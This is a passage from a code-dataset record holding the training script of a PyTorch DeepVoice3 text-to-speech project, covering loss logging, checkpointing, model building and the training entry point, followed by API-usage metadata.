g=hparams.guided_attention_sigma)\n soft_mask = torch.from_numpy(soft_mask).to(device)\n attn_loss = (attn * soft_mask).mean()\n loss += attn_loss\n\n if global_step > 0 and global_step % checkpoint_interval == 0:\n save_states(\n global_step, writer, mel_outputs, linear_outputs, attn,\n mel, y, input_lengths, checkpoint_dir)\n save_checkpoint(\n model, optimizer, global_step, checkpoint_dir, global_epoch,\n train_seq2seq, train_postnet)\n\n if global_step > 0 and global_step % hparams.eval_interval == 0:\n eval_model(global_step, writer, device, model,\n checkpoint_dir, ismultispeaker)\n\n # Update\n loss.backward()\n if clip_thresh > 0:\n grad_norm = torch.nn.utils.clip_grad_norm_(\n model.get_trainable_parameters(), clip_thresh)\n optimizer.step()\n\n # Logs\n writer.add_scalar(\"loss\", float(loss.item()), global_step)\n if train_seq2seq:\n writer.add_scalar(\"done_loss\", float(done_loss.item()), global_step)\n writer.add_scalar(\"mel loss\", float(mel_loss.item()), 
global_step)\n writer.add_scalar(\"mel_l1_loss\", float(mel_l1_loss.item()), global_step)\n writer.add_scalar(\"mel_binary_div_loss\", float(mel_binary_div.item()), global_step)\n if train_postnet:\n writer.add_scalar(\"linear_loss\", float(linear_loss.item()), global_step)\n writer.add_scalar(\"linear_l1_loss\", float(linear_l1_loss.item()), global_step)\n writer.add_scalar(\"linear_binary_div_loss\", float(linear_binary_div.item()), global_step)\n if train_seq2seq and hparams.use_guided_attention:\n writer.add_scalar(\"attn_loss\", float(attn_loss.item()), global_step)\n if clip_thresh > 0:\n writer.add_scalar(\"gradient norm\", grad_norm, global_step)\n writer.add_scalar(\"learning rate\", current_lr, global_step)\n\n global_step += 1\n running_loss += loss.item()\n\n averaged_loss = running_loss / (len(data_loader))\n writer.add_scalar(\"loss (per epoch)\", averaged_loss, global_epoch)\n print(\"Loss: {}\".format(running_loss / (len(data_loader))))\n\n global_epoch += 1\n\n\ndef save_checkpoint(model, optimizer, step, checkpoint_dir, epoch,\n train_seq2seq, train_postnet):\n if train_seq2seq and train_postnet:\n suffix = \"\"\n m = model\n elif train_seq2seq:\n suffix = \"_seq2seq\"\n m = model.seq2seq\n elif train_postnet:\n suffix = \"_postnet\"\n m = model.postnet\n\n checkpoint_path = join(\n checkpoint_dir, \"checkpoint_step{:09d}{}.pth\".format(global_step, suffix))\n optimizer_state = optimizer.state_dict() if hparams.save_optimizer_state else None\n torch.save({\n \"state_dict\": m.state_dict(),\n \"optimizer\": optimizer_state,\n \"global_step\": step,\n \"global_epoch\": epoch,\n }, checkpoint_path)\n print(\"Saved checkpoint:\", checkpoint_path)\n\n\ndef build_model():\n model = getattr(builder, hparams.builder)(\n n_speakers=hparams.n_speakers,\n speaker_embed_dim=hparams.speaker_embed_dim,\n n_vocab=_frontend.n_vocab,\n embed_dim=hparams.text_embed_dim,\n mel_dim=hparams.num_mels,\n linear_dim=hparams.fft_size // 2 + 1,\n r=hparams.outputs_per_step,\n downsample_step=hparams.downsample_step,\n padding_idx=hparams.padding_idx,\n dropout=hparams.dropout,\n kernel_size=hparams.kernel_size,\n encoder_channels=hparams.encoder_channels,\n decoder_channels=hparams.decoder_channels,\n converter_channels=hparams.converter_channels,\n use_memory_mask=hparams.use_memory_mask,\n trainable_positional_encodings=hparams.trainable_positional_encodings,\n force_monotonic_attention=hparams.force_monotonic_attention,\n use_decoder_state_for_postnet_input=hparams.use_decoder_state_for_postnet_input,\n max_positions=hparams.max_positions,\n speaker_embedding_weight_std=hparams.speaker_embedding_weight_std,\n freeze_embedding=hparams.freeze_embedding,\n window_ahead=hparams.window_ahead,\n window_backward=hparams.window_backward,\n key_projection=hparams.key_projection,\n value_projection=hparams.value_projection,\n )\n return model\n\n\ndef _load(checkpoint_path):\n if use_cuda:\n checkpoint = torch.load(checkpoint_path)\n else:\n checkpoint = torch.load(checkpoint_path,\n map_location=lambda storage, loc: storage)\n return checkpoint\n\n\ndef load_checkpoint(path, model, optimizer, reset_optimizer):\n global global_step\n global global_epoch\n\n print(\"Load checkpoint from: {}\".format(path))\n checkpoint = _load(path)\n model.load_state_dict(checkpoint[\"state_dict\"])\n if not reset_optimizer:\n optimizer_state = checkpoint[\"optimizer\"]\n if optimizer_state is not None:\n print(\"Load optimizer state from {}\".format(path))\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n 
global_step = checkpoint[\"global_step\"]\n global_epoch = checkpoint[\"global_epoch\"]\n\n return model\n\n\ndef _load_embedding(path, model):\n state = _load(path)[\"state_dict\"]\n key = \"seq2seq.encoder.embed_tokens.weight\"\n model.seq2seq.encoder.embed_tokens.weight.data = state[key]\n\n# https://discuss.pytorch.org/t/how-to-load-part-of-pre-trained-model/1113/3\n\n\ndef restore_parts(path, model):\n print(\"Restore part of the model from: {}\".format(path))\n state = _load(path)[\"state_dict\"]\n model_dict = model.state_dict()\n valid_state_dict = {k: v for k, v in state.items() if k in model_dict}\n\n try:\n model_dict.update(valid_state_dict)\n model.load_state_dict(model_dict)\n except RuntimeError as e:\n # there should be invalid size of weight(s), so load them per parameter\n print(str(e))\n model_dict = model.state_dict()\n for k, v in valid_state_dict.items():\n model_dict[k] = v\n try:\n model.load_state_dict(model_dict)\n except RuntimeError as e:\n print(str(e))\n warn(\"{}: may contain invalid size of weight. skipping...\".format(k))\n\n\nif __name__ == \"__main__\":\n args = docopt(__doc__)\n print(\"Command line args:\\n\", args)\n checkpoint_dir = args[\"--checkpoint-dir\"]\n checkpoint_path = args[\"--checkpoint\"]\n checkpoint_seq2seq_path = args[\"--checkpoint-seq2seq\"]\n checkpoint_postnet_path = args[\"--checkpoint-postnet\"]\n load_embedding = args[\"--load-embedding\"]\n checkpoint_restore_parts = args[\"--restore-parts\"]\n speaker_id = args[\"--speaker-id\"]\n speaker_id = int(speaker_id) if speaker_id is not None else None\n preset = args[\"--preset\"]\n\n data_root = args[\"--data-root\"]\n if data_root is None:\n data_root = join(dirname(__file__), \"data\", \"ljspeech\")\n\n log_event_path = args[\"--log-event-path\"]\n reset_optimizer = args[\"--reset-optimizer\"]\n\n # Which model to be trained\n train_seq2seq = args[\"--train-seq2seq-only\"]\n train_postnet = args[\"--train-postnet-only\"]\n # train both if not specified\n if not train_seq2seq and not train_postnet:\n print(\"Training whole model\")\n train_seq2seq, train_postnet = True, True\n if train_seq2seq:\n print(\"Training seq2seq model\")\n elif train_postnet:\n print(\"Training postnet model\")\n else:\n assert False, \"must be specified wrong args\"\n\n # Load preset if specified\n if preset is not None:\n with open(preset) as f:\n hparams.parse_json(f.read())\n # Override hyper parameters\n hparams.parse(args[\"--hparams\"])\n\n # Preventing Windows specific error such as MemoryError\n # Also reduces the occurrence of THAllocator.c 0x05 error in Widows build of PyTorch\n if platform.system() == \"Windows\":\n print(\" [!] 
Windows Detected - IF THAllocator.c 0x05 error occurs SET num_workers to 1\")\n\n assert hparams.name == \"deepvoice3\"\n print(hparams_debug_string())\n\n _frontend = getattr(frontend, hparams.frontend)\n\n os.makedirs(checkpoint_dir, exist_ok=True)\n\n # Input dataset definitions\n X = FileSourceDataset(TextDataSource(data_root, speaker_id))\n Mel = FileSourceDataset(MelSpecDataSource(data_root, speaker_id))\n Y = FileSourceDataset(LinearSpecDataSource(data_root, speaker_id))\n\n # Prepare sampler\n frame_lengths = Mel.file_data_source.frame_lengths\n sampler = PartialyRandomizedSimilarTimeLengthSampler(\n frame_lengths, batch_size=hparams.batch_size)\n\n # Dataset and Dataloader setup\n dataset = PyTorchDataset(X, Mel, Y)\n data_loader = data_utils.DataLoader(\n dataset, batch_size=hparams.batch_size,\n num_workers=hparams.num_workers, sampler=sampler,\n collate_fn=collate_fn, pin_memory=hparams.pin_memory, drop_last=True)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n # Model\n model = build_model().to(device)\n\n optimizer = optim.Adam(model.get_trainable_parameters(),\n lr=hparams.initial_learning_rate, betas=(\n hparams.adam_beta1, hparams.adam_beta2),\n eps=hparams.adam_eps, weight_decay=hparams.weight_decay,\n amsgrad=hparams.amsgrad)\n\n if checkpoint_restore_parts is not None:\n restore_parts(checkpoint_restore_parts, model)\n\n # Load checkpoints\n if checkpoint_postnet_path is not None:\n load_checkpoint(checkpoint_postnet_path, model.postnet, optimizer, reset_optimizer)\n\n if checkpoint_seq2seq_path is not None:\n load_checkpoint(checkpoint_seq2seq_path, model.seq2seq, optimizer, reset_optimizer)\n\n if checkpoint_path is not None:\n load_checkpoint(checkpoint_path, model, optimizer, reset_optimizer)\n\n # Load embedding\n if load_embedding is not None:\n print(\"Loading embedding from {}\".format(load_embedding))\n _load_embedding(load_embedding, model)\n\n # Setup summary writer for tensorboard\n if log_event_path is None:\n if platform.system() == \"Windows\":\n log_event_path = \"log/run-test\" + str(datetime.now()).replace(\" \", \"_\").replace(\":\", \"_\")\n else:\n log_event_path = \"log/run-test\" + str(datetime.now()).replace(\" \", \"_\")\n print(\"Log event path: {}\".format(log_event_path))\n writer = SummaryWriter(log_event_path)\n\n # Train!\n try:\n train(device, model, data_loader, optimizer, writer,\n init_lr=hparams.initial_learning_rate,\n checkpoint_dir=checkpoint_dir,\n checkpoint_interval=hparams.checkpoint_interval,\n nepochs=hparams.nepochs,\n clip_thresh=hparams.clip_thresh,\n train_seq2seq=train_seq2seq, train_postnet=train_postnet)\n except KeyboardInterrupt:\n save_checkpoint(\n model, optimizer, global_step, checkpoint_dir, global_epoch,\n train_seq2seq, train_postnet)\n\n print(\"Finished\")\n sys.exit(0)\n", "repo_name": "r9y9/deepvoice3_pytorch", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 38196, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1900, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.cuda.is_available", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.pad", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 73, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot.subplots", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "nnmnkwii.datasets.FileDataSource", "line_number": 96, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 118, "usage_type": "call"}, {"api_name": "deepvoice3_pytorch.frontend", "line_number": 133, "usage_type": "argument"}, {"api_name": "hparams.hparams.frontend", "line_number": 133, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 133, "usage_type": "name"}, {"api_name": "hparams.hparams.replace_pronunciation_prob", "line_number": 134, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 134, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 136, "usage_type": "call"}, {"api_name": "hparams.hparams", "line_number": 137, "usage_type": "argument"}, {"api_name": "numpy.random.rand", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 139, "usage_type": "attribute"}, {"api_name": "hparams.hparams.gc_probability", "line_number": 139, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 139, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 146, "usage_type": "attribute"}, {"api_name": "nnmnkwii.datasets.FileDataSource", "line_number": 149, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.utils.data.sampler.Sampler", "line_number": 195, "usage_type": "name"}, {"api_name": "torch.sort", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 205, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 227, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 228, "usage_type": "call"}, {"api_name": 
"random.shuffle", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 265, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 274, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 274, "usage_type": "name"}, {"api_name": "torch.nn.L1Loss", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 277, "usage_type": "name"}, {"api_name": "hparams.hparams.outputs_per_step", "line_number": 295, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 295, "usage_type": "name"}, {"api_name": "hparams.hparams.downsample_step", "line_number": 296, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 296, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 318, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 319, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 321, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 325, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 329, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 334, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 335, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 345, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 349, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 352, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 355, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 364, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 364, "usage_type": "name"}, {"api_name": "hparams.hparams.builder", "line_number": 369, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 369, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 375, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.cm.magma", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 376, "usage_type": "name"}, {"api_name": "synthesis._frontend", "line_number": 390, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 392, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 393, "usage_type": "call"}, {"api_name": "hparams.hparams.n_speakers", "line_number": 400, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 400, "usage_type": "name"}, {"api_name": "synthesis.tts", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 407, "usage_type": "call"}, {"api_name": 
"numpy.abs", "line_number": 407, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 410, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 415, "usage_type": "call"}, {"api_name": "matplotlib.cm.viridis", "line_number": 415, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 415, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 415, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 417, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 424, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 427, "usage_type": "call"}, {"api_name": "audio.save_wav", "line_number": 429, "usage_type": "call"}, {"api_name": "hparams.hparams.sample_rate", "line_number": 433, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 433, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 435, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.cm.viridis", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 454, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 455, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 457, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 460, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 464, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 467, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 469, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 475, "usage_type": "call"}, {"api_name": "matplotlib.cm.viridis", "line_number": 475, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 475, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 476, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 478, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 483, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 488, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 494, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 499, "usage_type": "call"}, {"api_name": "audio.inv_spectrogram", "line_number": 503, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 505, "usage_type": "call"}, {"api_name": "hparams.hparams.sample_rate", "line_number": 509, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 509, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 511, "usage_type": "call"}, {"api_name": "audio.save_wav", "line_number": 513, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 518, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 522, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 528, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 533, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 538, "usage_type": "call"}, {"api_name": "torch.nn.L1Loss", "line_number": 549, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 549, "usage_type": "name"}, {"api_name": 
"hparams.hparams.masked_loss_weight", "line_number": 551, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 551, "usage_type": "name"}, {"api_name": "hparams.hparams.binary_divergence_weight", "line_number": 572, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 572, "usage_type": "name"}, {"api_name": "torch.log1p", "line_number": 576, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 576, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 587, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 587, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 590, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 585, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 597, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 597, "usage_type": "attribute"}, {"api_name": "hparams.hparams.outputs_per_step", "line_number": 610, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 610, "usage_type": "name"}, {"api_name": "hparams.hparams.downsample_step", "line_number": 611, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 611, "usage_type": "name"}, {"api_name": "torch.nn.BCELoss", "line_number": 614, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 614, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 623, "usage_type": "call"}, {"api_name": "hparams.hparams.lr_schedule", "line_number": 627, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 627, "usage_type": "name"}, {"api_name": "hparams.hparams.lr_schedule", "line_number": 628, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 628, "usage_type": "name"}, {"api_name": "hparams.hparams.lr_schedule_kwargs", "line_number": 630, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 630, "usage_type": "name"}, {"api_name": "hparams.hparams.max_positions", "line_number": 647, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 647, "usage_type": "name"}, {"api_name": "hparams.hparams.max_positions", "line_number": 652, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 652, "usage_type": "name"}, {"api_name": "hparams.hparams.masked_loss_weight", "line_number": 666, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 666, "usage_type": "name"}, {"api_name": "hparams.hparams.binary_divergence_weight", "line_number": 704, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 704, "usage_type": "name"}, {"api_name": "hparams.hparams.priority_freq", "line_number": 718, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 718, "usage_type": "name"}, {"api_name": "hparams.hparams.sample_rate", "line_number": 718, "usage_type": "attribute"}, {"api_name": "hparams.hparams.priority_freq_weight", "line_number": 722, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 722, "usage_type": "name"}, {"api_name": "hparams.hparams.use_guided_attention", "line_number": 734, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 734, "usage_type": "name"}, {"api_name": "hparams.hparams.guided_attention_sigma", "line_number": 737, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 737, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 738, "usage_type": "call"}, {"api_name": 
"hparams.hparams.eval_interval", "line_number": 750, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 750, "usage_type": "name"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 757, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 757, "usage_type": "attribute"}, {"api_name": "hparams.hparams.use_guided_attention", "line_number": 772, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 772, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 800, "usage_type": "call"}, {"api_name": "hparams.hparams.save_optimizer_state", "line_number": 802, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 802, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 803, "usage_type": "call"}, {"api_name": "deepvoice3_pytorch.builder", "line_number": 813, "usage_type": "argument"}, {"api_name": "hparams.hparams.builder", "line_number": 813, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 813, "usage_type": "name"}, {"api_name": "hparams.hparams.n_speakers", "line_number": 814, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 814, "usage_type": "name"}, {"api_name": "hparams.hparams.speaker_embed_dim", "line_number": 815, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 815, "usage_type": "name"}, {"api_name": "hparams.hparams.text_embed_dim", "line_number": 817, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 817, "usage_type": "name"}, {"api_name": "hparams.hparams.num_mels", "line_number": 818, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 818, "usage_type": "name"}, {"api_name": "hparams.hparams.fft_size", "line_number": 819, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 819, "usage_type": "name"}, {"api_name": "hparams.hparams.outputs_per_step", "line_number": 820, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 820, "usage_type": "name"}, {"api_name": "hparams.hparams.downsample_step", "line_number": 821, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 821, "usage_type": "name"}, {"api_name": "hparams.hparams.padding_idx", "line_number": 822, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 822, "usage_type": "name"}, {"api_name": "hparams.hparams.dropout", "line_number": 823, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 823, "usage_type": "name"}, {"api_name": "hparams.hparams.kernel_size", "line_number": 824, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 824, "usage_type": "name"}, {"api_name": "hparams.hparams.encoder_channels", "line_number": 825, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 825, "usage_type": "name"}, {"api_name": "hparams.hparams.decoder_channels", "line_number": 826, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 826, "usage_type": "name"}, {"api_name": "hparams.hparams.converter_channels", "line_number": 827, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 827, "usage_type": "name"}, {"api_name": "hparams.hparams.use_memory_mask", "line_number": 828, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 828, "usage_type": "name"}, {"api_name": "hparams.hparams.trainable_positional_encodings", "line_number": 829, "usage_type": "attribute"}, 
{"api_name": "hparams.hparams", "line_number": 829, "usage_type": "name"}, {"api_name": "hparams.hparams.force_monotonic_attention", "line_number": 830, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 830, "usage_type": "name"}, {"api_name": "hparams.hparams.use_decoder_state_for_postnet_input", "line_number": 831, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 831, "usage_type": "name"}, {"api_name": "hparams.hparams.max_positions", "line_number": 832, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 832, "usage_type": "name"}, {"api_name": "hparams.hparams.speaker_embedding_weight_std", "line_number": 833, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 833, "usage_type": "name"}, {"api_name": "hparams.hparams.freeze_embedding", "line_number": 834, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 834, "usage_type": "name"}, {"api_name": "hparams.hparams.window_ahead", "line_number": 835, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 835, "usage_type": "name"}, {"api_name": "hparams.hparams.window_backward", "line_number": 836, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 836, "usage_type": "name"}, {"api_name": "hparams.hparams.key_projection", "line_number": 837, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 837, "usage_type": "name"}, {"api_name": "hparams.hparams.value_projection", "line_number": 838, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 838, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 845, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 847, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 897, "usage_type": "call"}, {"api_name": "docopt.docopt", "line_number": 901, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 915, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 915, "usage_type": "call"}, {"api_name": "hparams.hparams.parse_json", "line_number": 937, "usage_type": "call"}, {"api_name": "hparams.hparams", "line_number": 937, "usage_type": "name"}, {"api_name": "hparams.hparams.parse", "line_number": 939, "usage_type": "call"}, {"api_name": "hparams.hparams", "line_number": 939, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 943, "usage_type": "call"}, {"api_name": "hparams.hparams.name", "line_number": 946, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 946, "usage_type": "name"}, {"api_name": "hparams.hparams_debug_string", "line_number": 947, "usage_type": "call"}, {"api_name": "deepvoice3_pytorch.frontend", "line_number": 949, "usage_type": "argument"}, {"api_name": "hparams.hparams.frontend", "line_number": 949, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 949, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 951, "usage_type": "call"}, {"api_name": "nnmnkwii.datasets.FileSourceDataset", "line_number": 954, "usage_type": "call"}, {"api_name": "nnmnkwii.datasets.FileSourceDataset", "line_number": 955, "usage_type": "call"}, {"api_name": "nnmnkwii.datasets.FileSourceDataset", "line_number": 956, "usage_type": "call"}, {"api_name": "hparams.hparams.batch_size", "line_number": 961, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 961, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", 
